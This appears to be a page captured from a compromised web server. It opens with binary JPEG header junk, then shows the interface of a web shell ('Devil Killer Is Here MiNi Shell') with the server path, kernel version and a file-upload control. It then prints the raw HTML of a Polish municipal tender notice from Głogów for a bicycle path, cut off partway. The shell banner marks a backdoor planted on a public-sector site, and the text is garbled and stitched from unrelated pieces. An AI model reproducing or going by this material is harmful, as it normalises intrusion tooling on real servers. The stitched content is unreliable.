JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220330/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220330/0010389303-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa międzygminnej drogi rowerowej – zadanie nr 2, w formule „zaprojektuj i wybuduj” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Głogów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647297</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Głogów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">76 7265437</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@glogow.um.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.glogow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa międzygminnej drogi rowerowej – zadanie nr 2, w formule „zaprojektuj i wybuduj” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-08c94101-b01d-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00103893</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00027272/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.24 Budowa międzygminnej drogi rowerowej - zadanie nr 2 w ramach realizacji projektu pn. &#34;Ochrona i udostępnianie cennych przyrodniczo terenów rzeki Odry w wybranych gminach Legnicko-Głogowskiego Obszaru</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> w ramach realizacji projektu partnerskiego pn. „Ochrona i udostępnianie cennych przyrodniczo terenów rzeki Odry w wybranych gminach Legnicko-Głogowskiego Obszaru Interwencji” ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2014-2020 (RPO WD 2014-2020), współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego (EFRR) </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://glogow-um.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://glogow-um.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)zgłoszenie do postępowania wymaga<br/>zalogowania wykonawcy do systemu<br/>https://glogow-um.ezamawiajacy.pl , www.glogow.bip.info.pl. (przez Biuletyn Informacji Publicznej<br/>zakładka „Zamówienia publiczne”, Platforma zakupowa MarketPlanet); 2) wykonawca po wybraniu<br/>opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia<br/>hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie<br/>„zarejestruj się”;3) rejestracja wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym<br/>zamawiający zaleca wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie<br/>złożenia oferty w postaci elektronicznej; wykonawca wraz z potwierdzeniem złożenia wniosku<br/>rejestracyjnego otrzyma informację, o możliwości przyspieszenia procedury założenia konta, wówczas<br/>należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu; 4)po założeniu konta<br/>wykonawca ma możliwość złożenia oferty w postępowaniu; komunikacja między zamawiającym a<br/>wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej za pośrednictwem platformy zakupowej; za datę przekazania zaświadczeń oraz<br/>informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „korespondencja”;5)wykonawca<br/>może zwrócić się do zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za<br/>pośrednictwem platformy zakupowej przez opcję „zadaj pytanie” lub przy użyciu zakładki<br/>„korespondencja”. W celu zadania pytania zamawiającemu, wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE;<br/>powoduje to otwarcie okna, w którym należy uzupełnić dane<br/>Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym<br/>kodem weryfikującym z obrazka, klika klawisz POTWIERDŹ. Wykonawca uzyskuje potwierdzenie<br/>wysłania pytania poprzez komunikat systemowy &#34;pytanie wysłane&#34;.6)Zamawiający informuje, iż w<br/>przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Głogów tel.<br/>+48 22 2572224 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail:<br/>oneplace@marketplanet.pl;7)Zamawiający zgodnie z § 2 rozporządzenia Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452), określa<br/>dopuszczalny format podpisu elektronicznego, jako:- dokumenty w formacie „pdf&#34; - zaleca się<br/>podpisywać formatem PAdES,- dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;,<br/>wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany<br/>załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.3.niezbędne wymagania<br/>sprzętowo- aplikacyjne umożliwiające pracę na platformie zakupowej tj.:1)stały dostęp do sieci Internet<br/>o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;2)komputer klasy PC lub MAC, o<br/>następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;3)zainstalowana dowolna<br/>przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet<br/>Explorer minimalnie wersja 10.0;4)włączona obsługa JavaScript;5)zainstalowany program Acrobat<br/>Reader lub inny obsługujący pliki w formacie .pdf.4.dopuszczalne formaty przesyłanych danych: pliki o<br/>wielkości do 100 MB w txt, zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">obowiązkowe informacje zostały zawarte w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">obowiązkowe informacje zostały zawarte w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP271.17.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach projektu planuje się utworzenie szlaku rowerowego przebiegającego przez tereny gmin będących Stronami umowy partnerskiej. Łączna długości szlaku zaplanowanego do zaprojektowania i wybudowania wyniesie ok. 25,26 km, w tym na terenie poszczególnych gmin uczestniczących w projekcie:<br/>1) Gmina Miejska Głogów – ok. 1,9 km*<br/>2) Gmina Głogów – ok. 5,06 km<br/>3) Gmina Kotla - ok. 18,30 km <br/><br/>w tym budowa międzygminnej drogi/ścieżki rowerowej na terenie gmin Głogów i Kotla.<br/>Długości planowanych do budowy odcinków drogi/ścieżki rowerowej na terenie ww. gmin:<br/>1) Gmina Głogów – ok. 2,90 km<br/>2) Gmina Kotla – ok. 14,65 km <br/>Parametry techniczne ścieżki rowerowej, dane dotyczące konstrukcji, oznakowania (znaki drogowe/bezpieczeństwa ruchu drogowego) opisane szczegółowo zostały w dokumentach zamówienia, tj. Programie funkcjonalno-użytkowym i Aneksie do programu funkcjonalno – użytkowego. Aneks do programu funkcjonalno-użytkowego został opracowany z uwagi na konieczność zmiany odcinka trasy/przebiegu ścieżki/drogi rowerowej pomiędzy m. Grodziec Małym a m. Ceber oraz wytyczenia szlaku rowerowego na terenie Gminy Miejskiej Głogów. Całą trasę/przebieg ścieżki/drogi rowerowej do wykonania obrazuje załącznik nr 10 do niniejszej SWZ oraz wykaz działek zamiennych (dotyczy tylko odcinka zmienionej trasy Grodziec Mały - Ceber); zmiana trasy nie oznacza budowania obu tras z m. Grodziec Mały do m. Ceber – trasa na tym odcinku powinna być wykonana wg Aneksu do PFU – załącznik nr 11 do niniejszej SWZ.<br/><br/>Zgodnie z załączonymi dokumentami zakres prac/robót obejmuje: wytyczenie szlaku rowerowego, budowę ścieżki i drogi rowerowej oraz wykonanie pozostałych robót i prac określonych w dokumentach zamówienia i SWZ (należy uwzględnić wyłączenia z zakresu projektowania i robót określone w dalszej części SWZ). <br/><br/>Zakres robót obejmuje również zakup, dostawę i trwały montaż ławek zgodnie z opracowanymi Programem funkcjonalno-użytkowym i aneksem do niego, usuwania wszelkich kolizji, nasadzeń zastępczych, oświetlenia przejazdów, spełnienia wszelkich warunków stawianym przez Zarządców dróg i terenów. <br/><br/>Trasa przebiegać będzie częściowo po śladzie nieistniejącej już linii kolejowej, po dawnym nasypie kolejowym. Na planowanej trasie drogi rowerowej mogą występować/występują istniejące szyny i podkłady do rozbiórki, kolidująca zieleń do wycinki, istniejący obiekt mostowy nad ciekiem wodnym „Krzycki Rów”, pozostałości po wiaduktach, nasypy, gruz, śmieci itp.<br/><br/>Przedmiot zamówienia należy zaprojektować w oparciu o obowiązujące przepisy, normy, parametry oraz wytyczne Instytutu Rozwoju Terytorialnego., o których mowa w dokumentach zamówienia. <br/><br/>W przypadku konieczności wyjścia poza pas drogowy należy uzyskać decyzję o Zezwoleniu na Realizację Inwestycji Drogowej. <br/><br/>Obiekt należy zaprojektować i wykonać w taki sposób, aby uzyskać założone parametry techniczno-użytkowe określone w SWZ i dokumentach zamówienia w szczególności w programie funkcjonalno-użytkowym oraz aneksie do programu funkcjonalno-użytkowego. Pozostałe szczegóły opisu przedmiotu zamówienia zawarto w dokumentach zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45100000-8 - Przygotowanie terenu pod budowę</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-17</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi na wykonane roboty i zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>1)	sytuacji ekonomicznej i finansowej; <br/>a) posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 500.000,00 zł:<br/>co potwierdzą poprzez złożenie aktualnej informacji banku,<br/>b) posiadają ubezpieczenie od OC z tytułu prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na kwotę co najmniej 2.000.000,00 złotych<br/><br/>2) zdolności technicznej lub zawodowej, tj. <br/>a) posiadają doświadczenie umożliwiające realizację zamówienia tzn.:<br/>- w okresie ostatnich ośmiu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej<br/>jedno zadanie w zakresie budowy/przebudowy/rozbudowy/remontu ulicy/jezdni lub drogi lub ścieżki rowerowej lub ciągu pieszo-rowerowego lub chodnika lub placu o nawierzchni bitumicznej/ betonu wałowanego wraz z odwodnieniem o powierzchni co najmniej 3.000,00 m2 ( trzy tysiące m2) lub o wartości min. 2.000.000,00 zł., <br/><br/>oraz <br/><br/>- w okresie ostatnich ośmiu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej jedną robotę budowlaną polegającą na budowie/przebudowie oświetlenia ulicznego/parkowego, <br/><br/>oraz <br/><br/>- w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonali co najmniej jedno opracowanie dokumentacji projektowej wraz z uzyskaniem prawomocnej decyzji pozwolenia na budowę lub ZRID dotyczącej budowy/przebudowy/rozbudowy/remontu dróg/jezdni/ulic lub chodników lub parkingów lub ciągów pieszo-rowerowych lub ścieżek rowerowych wraz z oświetleniem,<br/><br/>co potwierdzą w wykazie wykonanych robót i usług oraz referencjami;”<br/><br/>b)	dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia tj:<br/><br/> W zakresie osób wchodzących w skład Zespołu projektowego Wykonawca winien dysponować następującymi osobami:<br/><br/>- projektant, będący jednocześnie koordynatorem zespołu wykonującego dokumentację projektową, z uprawnieniami do projektowania w specjalności inżynieryjnej drogowej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji zamówienia z min. 3 letnią praktyką zawodową <br/><br/>- projektant z uprawnieniami do projektowania w specjalności inżynieryjnej mostowej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji zamówienia z min. 3 letnią praktyką zawodową<br/><br/>- projektant z uprawnieniami do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji zamówienia z min. 3 letnią praktyką zawodową<br/><br/>- projektant z uprawnieniami do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji zamówienia z min. 3 letnią praktyką zawodową<br/> <br/>- projektant z uprawnieniami do projektowania w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń telekomunikacyjnych z min. 3 letnią praktyką zawodową<br/><br/>Wykonawca winien także dysponować osobami sprawdzającymi poszczególne branże.<br/><br/>Uprawnienia kierownik budowy i kierownicy robót:<br/><br/>- Kierownik budowy (1 osoba) posiadający uprawnienia do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika robót dla budowy będącej przedmiotem zamówienia oraz co najmniej 3 letnie doświadczenie w kierowaniu budową w zakresie robót drogowych<br/><br/>- Kierownik robót (1 osoba) posiadający uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika dla budowy będącej przedmiotem zamówienia oraz co najmniej 3 letnie doświadczenie w kierowaniu budową w zakresie robót konstrukcyjno-budowlanych<br/><br/> - Kierownik robót (1 osoba) posiadający uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych wentylacyjnych, gazowych i wodociągowych lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika robót dla budowy będącej przedmiotem zamówienia oraz co najmniej <br/>3 letnie doświadczenie w kierowaniu budową w zakresie robót sanitarnych<br/><br/>- Kierownik robót (1 osoba) posiadający uprawnienia do kierowania robotami budowlanymi specjalności inżynieryjnej mostowej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika robót dla budowy będącej przedmiotem zamówienia oraz co najmniej 3 letnie doświadczenie w kierowaniu budową w zakresie robót mostowych<br/><br/>- Kierownik robót (1 osoba) posiadający uprawnienia do kierowania robotami budowlanymi specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im równoważne uprawnienia budowlane, bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika robót dla budowy będącej przedmiotem zamówienia oraz co najmniej 3 letnie doświadczenie w kierowaniu budową w zakresie robót elektrycznych<br/><br/>- Kierownik robót z uprawnieniami do kierowania robotami budowlanymi specjalności instalacyjnej w zakresie sieci instalacji i urządzeń telekomunikacyjnych, bądź też odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji kierownika robót dla budowy będącej przedmiotem zamówienia oraz co najmniej 3 letnie doświadczenie w kierowaniu budową w zakresie robót teletechnicznych<br/><br/> - osobą posiadającą zaświadczenie w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach nieruchomych (przedmiotowe zamówienie znajduje się w strefie objętej ochroną konserwatorską) lub brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury, przez co najmniej 18 miesięcy<br/><br/>co potwierdzą w wykazie osób zdolnych do realizacji zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: 